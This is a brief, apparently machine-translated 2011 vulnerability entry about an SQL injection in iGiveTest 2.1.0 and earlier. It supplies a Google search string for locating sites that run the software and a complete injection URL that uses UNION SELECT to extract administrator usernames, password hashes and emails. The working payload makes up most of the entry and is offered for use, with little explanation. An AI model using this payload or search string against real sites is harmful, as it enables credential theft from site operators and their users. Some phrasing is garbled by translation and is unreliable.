iGiveTest 2.1.0 injection vulnerability-vulnerability warning-the black bar safety net

2011-07-29T00:00:00
ID MYHACK58:62201131379
Type myhack58
Reporter 佚名
Modified 2011-07-29T00:00:00

Description

Version: <= 2.1.0

Homepage: http://iGiveTest.com/

Google keywords: “Powered by iGiveTest”

Just register for an account. And then the storm of the administrator account and password

http://www.xxxx.com/users.php?action=groups&order=-1&the userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1